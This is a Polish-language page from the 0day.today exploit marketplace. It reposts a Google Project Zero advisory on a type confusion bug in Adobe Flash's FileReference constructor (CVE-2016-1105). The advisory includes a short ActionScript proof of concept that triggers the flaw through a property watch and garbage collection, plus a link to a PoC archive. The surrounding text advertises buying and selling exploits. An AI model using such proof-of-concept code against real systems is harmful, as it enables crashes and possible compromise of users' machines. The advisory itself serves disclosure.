[ home ]  [ prywatne ]  [ 0Day ]  [ discount ]  [ Zdobądź Gold ]  [ platformy ]  [ pentest ]  [ szukaj ]  [ faq ]  [ kontakt ]  [ styl ]  [ Prices in Gold ]   db: 39 457    
0day.today Exploit DB Oficjalny Facebook
0day.today Exploit DB Oficjalny Twitter
0day.today Exploit DB Oficjalny Kanał RSS
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Największa Baza Exploitów na Świecie.
Wybierz język:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Informacje które powinieneś wiedzieć o 0day.today:
  • Korzystamy z jednej głównej domeny: http://0day.today
  • Większość materiałów jest kompletnie DARMOWA
  • Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
    musisz zakupić lub zdobyć GOLD
We accept currencies: [contact admin to find more]
           
Nie chcemy byś używał naszej strony jako narzędzia do włamań, więc każdą czynnością która nielegalnie wpływa na innych użytkowników lub cudze witryny, narażasz się na zbanowanie i usunięcie wszystkich materiałów.

Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Jestem zarejestrowanym użytkownikiem 0day.today. Nie chcę widzieć tej notyfikacji w przyszłości.
Co na początek?
  1. Przeczytaj [ ugoda ]
  2. Przeczytaj [ Wyślij ] zasady
  3. Odwiedź [ faq ] strona
  4. [ Zarejestruj ] profil
  5. Zdobądź [ GOLD ]
  6. Jeżeli chcesz [ sprzedaj ]
  7. Jeżeli chcesz [ kup ]
  8. Jeżeli stracisz [ Konto ]
  9. Jakiekolwiek pytania [ [email protected] ]


Główne linki


Możesz się z nami skonaktować przez

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Market Exploitów i Baza Exploitów 0day

Adobe Flash - Type Confusion in FileReference Constructor

Autor
Google Security Research
Ryzyko
[
Średnie Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-26016
Kategoria
dos / poc
Data dodania
17-05-2016
CVE
CVE-2016-1105
Platforma
windows
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=799
 
There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.
 
A minimal PoC is as follows:
 
function myfunc(){
             
            this.__proto__ = {};
            this.__proto__.__constructor__ = flash.display.BitmapData;
            super(1000, 1000);
             
             
            }
             
 
    function mysubclass(){
         
 
        this.watch("name", myfunc);
        _global.ASnative(2204, 200)(this); // FileReference constructor
        this.unwatch("name"); // let the reference free
         
        }
    }
 
        var a = new subclass();
        a = 0;
        // wait for GC
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39829.zip

#  0day.today [2024-07-15]  #
0day.today Exploit Database kupuj i sprzedawaj exploity (local, remote, DoS, PoC, etc.)
Wszystkie zgłoszenia składać na mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team